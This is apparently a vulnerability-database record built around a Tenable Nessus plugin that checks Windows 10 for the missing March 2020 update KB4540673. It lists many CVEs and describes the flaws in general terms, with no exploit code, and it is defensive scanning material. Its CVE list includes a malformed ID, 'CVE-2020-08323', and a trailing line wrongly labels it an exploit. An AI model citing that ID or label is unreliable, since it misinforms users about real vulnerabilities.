"CVE-2020-0801", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0807", "CVE-2020-0808", "CVE-2020-0809", "CVE-2020-0810", "CVE-2020-0811", "CVE-2020-0812", "CVE-2020-0813", "CVE-2020-0814", "CVE-2020-0816", "CVE-2020-0819", "CVE-2020-0820", "CVE-2020-0822", "CVE-2020-0823", "CVE-2020-0824", "CVE-2020-0825", "CVE-2020-0826", "CVE-2020-0827", "CVE-2020-0828", "CVE-2020-0829", "CVE-2020-0830", "CVE-2020-0831", "CVE-2020-0832", "CVE-2020-08323", "CVE-2020-0833", "CVE-2020-0834", "CVE-2020-0840", "CVE-2020-0841", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0848", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0854", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0861", "CVE-2020-0863", "CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0867", "CVE-2020-0868", "CVE-2020-0869", "CVE-2020-0871", "CVE-2020-0874", "CVE-2020-0876", "CVE-2020-0877", "CVE-2020-0879", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887", "CVE-2020-0896", "CVE-2020-0897"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_MAR_4540673.NASL", "href": "https://www.tenable.com/plugins/nessus/134370", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134370);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0690\",\n \"CVE-2020-0762\",\n \"CVE-2020-0763\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0775\",\n \"CVE-2020-0776\",\n \"CVE-2020-0777\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0780\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0793\",\n \"CVE-2020-0797\",\n \"CVE-2020-0798\",\n \"CVE-2020-0799\",\n \"CVE-2020-0800\",\n \"CVE-2020-0801\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0807\",\n \"CVE-2020-0808\",\n \"CVE-2020-0809\",\n \"CVE-2020-0810\",\n \"CVE-2020-0811\",\n \"CVE-2020-0812\",\n \"CVE-2020-0813\",\n \"CVE-2020-0814\",\n \"CVE-2020-0816\",\n \"CVE-2020-0819\",\n \"CVE-2020-0820\",\n \"CVE-2020-0822\",\n \"CVE-2020-0823\",\n \"CVE-2020-0824\",\n \"CVE-2020-0825\",\n \"CVE-2020-0826\",\n \"CVE-2020-0827\",\n \"CVE-2020-0828\",\n \"CVE-2020-0829\",\n \"CVE-2020-0830\",\n \"CVE-2020-0831\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0834\",\n \"CVE-2020-0840\",\n \"CVE-2020-0841\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0848\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0854\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0861\",\n \"CVE-2020-0863\",\n \"CVE-2020-0864\",\n \"CVE-2020-0865\",\n \"CVE-2020-0866\",\n \"CVE-2020-0867\",\n \"CVE-2020-0868\",\n \"CVE-2020-0869\",\n \"CVE-2020-0871\",\n \"CVE-2020-0874\",\n \"CVE-2020-0876\",\n \"CVE-2020-0877\",\n \"CVE-2020-0879\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\",\n \"CVE-2020-0896\",\n \"CVE-2020-0897\"\n );\n script_xref(name:\"MSKB\", value:\"4540673\");\n script_xref(name:\"MSFT\", value:\"MS20-4540673\");\n script_xref(name:\"IAVA\", value:\"2020-A-0214-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4540673: Windows 10 Version 1903 and Windows 10 Version 1909 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4540673.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-0777, CVE-2020-0797,\n CVE-2020-0800, CVE-2020-0864, CVE-2020-0865,\n CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when\n Wind
Exploit for Vulnerability in Microsoft
